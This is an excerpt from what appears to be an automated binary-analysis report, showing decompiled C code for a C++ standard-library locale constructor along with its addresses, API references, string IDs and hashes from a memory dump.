                                                  • Associated: 00000001.00000002.231410757.0000000010409000.00000002.00020000.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _abort
                                                  • String ID: assert json failed$in Json::Value::setComment(): Comments must start with /
                                                  • API String ID: 1888311480-3359747093
                                                  • Opcode ID: c56229c0dd17345ef77e92aad40df9d759a09e95372b5866d612481c7000d63c
                                                  • Instruction ID: f51410651d1f4f3591cc84c21d601798cf6c658f3d52e8c4a7e1793ed2fd0674
                                                  • Opcode Fuzzy Hash: c56229c0dd17345ef77e92aad40df9d759a09e95372b5866d612481c7000d63c
                                                  • Instruction Fuzzy Hash: F9313575901218EBEB14CF60DC91F9EB771EB15351F5082D8E4596B280DB786E88CFA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 100047D0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 86%
                                                  			E100047D0(intOrPtr __ecx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v16;
				char _v56;
				char _v84;
				intOrPtr _v88;
				void* __ebp;
				void* _t39;
				void* _t56;
				void* _t57;
				void* _t58;
				intOrPtr _t59;

				_push(0xffffffff);
				_push(0x1017070c);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t59;
				_v88 = __ecx;
				E10022AB1(_v88, 0);
				_v8 = 0;
				E10002370(_v88 + 4);
				_v8 = 1;
				E10002370(_v88 + 0x20);
				_v8 = 2;
				E10002370(_v88 + 0x3c);
				_v8 = 3;
				E10002370(_v88 + 0x58);
				_v8 = 4;
				_t62 = _a4;
				if(_a4 == 0) {
					E10001320( &_v84, "bad locale name");
					_v8 = 5;
					E100046F0( &_v56, _t62,  &_v84);
					E10028911( &_v56, 0x1027f348);
					_v8 = 4;
					E10001360( &_v84);
				}
				E10022A0F(_t39, _a4, _t56, _t57, _t58, _t62, _v88, _a4);
				_v8 = 0xffffffff;
				 *[fs:0x0] = _v16;
				return _v88;
			}














                                                  0x100047d3
                                                  0x100047d5
                                                  0x100047e0
                                                  0x100047e1
                                                  0x100047eb
                                                  0x100047f3
                                                  0x100047f8
                                                  0x10004805
                                                  0x1000480a
                                                  0x10004814
                                                  0x10004819
                                                  0x10004823
                                                  0x10004828
                                                  0x10004832
                                                  0x10004837
                                                  0x1000483b
                                                  0x1000483f
                                                  0x10004849
                                                  0x1000484e
                                                  0x10004859
                                                  0x10004867
                                                  0x1000486c
                                                  0x10004873
                                                  0x10004873
                                                  0x10004880
                                                  0x10004888
                                                  0x10004895
                                                  0x1000489f

                                                  APIs
                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 100047F3
                                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 10004880
                                                    • Part of subcall function 10028911: RaiseException.KERNEL32(?,?,100235F7,10001F33,?,?,?,?,100235F7,10001F33,1027F310,10401814), ref: 10028951
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.230475280.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000001.00000002.230471949.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230642928.0000000010171000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230767992.0000000010289000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230780419.000000001028B000.00000008.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.231392398.0000000010401000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.231410757.0000000010409000.00000002.00020000.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: std::_$ExceptionLocinfo::_Locinfo_ctorLockitLockit::_Raise
                                                  • String ID: bad locale name
                                                  • API String ID: 3938578125-1405518554
                                                  • Opcode ID: a7ccac8e3d0f33a6d32eff9abd7e62158dfd656fc807623f1fef3cbee5a4056a
                                                  • Instruction ID: 095400531e99ff96a8e079db4db20960511de84e9f6df8617b8c41e8a6198733
                                                  • Opcode Fuzzy Hash: a7ccac8e3d0f33a6d32eff9abd7e62158dfd656fc807623f1fef3cbee5a4056a
                                                  • Instruction Fuzzy Hash: 77219374804188EBDB19DBD4C955BEDBB74EF11344F248158F4022B38ADB786F08CB55
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%